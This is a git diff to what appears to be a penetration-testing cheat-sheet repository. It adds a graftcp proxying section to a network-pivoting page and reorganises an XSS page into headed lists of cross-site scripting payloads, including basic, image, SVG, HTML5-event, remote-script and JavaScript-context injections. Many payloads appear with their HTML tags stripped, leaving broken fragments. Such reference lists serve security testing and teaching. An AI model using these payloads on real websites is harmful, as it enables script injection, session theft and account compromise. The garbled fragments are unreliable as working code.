diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index cd4bc9e..cf82ea9 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -8,6 +8,7 @@ * [Local Port Forwarding](#local-port-forwarding) * [Remote Port Forwarding](#remote-port-forwarding) * [Proxychains](#proxychains) +* [Graphtcp](#graphtcp) * [Web SOCKS - reGeorg](#web-socks---regeorg) * [Metasploit](#metasploit) * [sshuttle](#sshuttle) @@ -80,6 +81,17 @@ socks4 localhost 8080 Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` +## Graphtcp + +Same as proxychains, with another mechanism to "proxify" which allow Go applications. + +```powershell +git clone https://github.com/hmgle/graftcp.git +cd graftcp && make +graftcp-local/graftcp-local +./graftcp chromium-browser +``` + ## Web SOCKS - reGeorg [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. diff --git a/SQL Injection/Images/Unicode_SQL_injection.png b/SQL Injection/Images/Unicode_SQL_injection.png new file mode 100644 index 0000000..d9693d5 Binary files /dev/null and b/SQL Injection/Images/Unicode_SQL_injection.png differ diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 9cdfe91..566e054 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -11,6 +11,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [XSS in HTML/Applications](#xss-in-htmlapplications) + - [Common Payloads](#common-payloads) + - [XSS using HTML5 tags](#xss-using-html5-tags) + - [XSS using a remote JS](#xss-using-a-remote-js) + - [XSS in hidden input](#xss-in-hidden-input) + - [DOM based XSS](#dom-based-xss) + - [XSS in JS Context](#xss-in-js-context) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in PostMessage](#xss-in-postmessage) @@ -119,16 +125,16 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all] ## XSS in HTML/Applications -XSS Basic +### Common Payloads ```javascript -Basic payload +// Basic payload ipt>alert('XSS')ipt> "> "> -Img payload +// Img payload @@ -137,7 +143,7 @@ Img payload "> "> -Svg payload +// Svg payload (`Firefox` is the only browser which allows self closing script) -Div payload +// Div payload
MOVE HERE
MOVE HERE
MOVE HERE
@@ -157,7 +163,7 @@ Div payload
MOVE HERE
``` -XSS for HTML5 +### XSS using HTML5 tags ```javascript @@ -178,40 +184,36 @@ XSS for HTML5 // When a finger is dragged across the screen. ``` -XSS using script tag (external payload) +### XSS using a remote JS -```javascript +```html + ``` -XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) +### XSS in JS Context ```javascript -(confirm)(document.domain)// ; alert(1);// -``` - -XSS URL - -```javascript -URL/ -URL/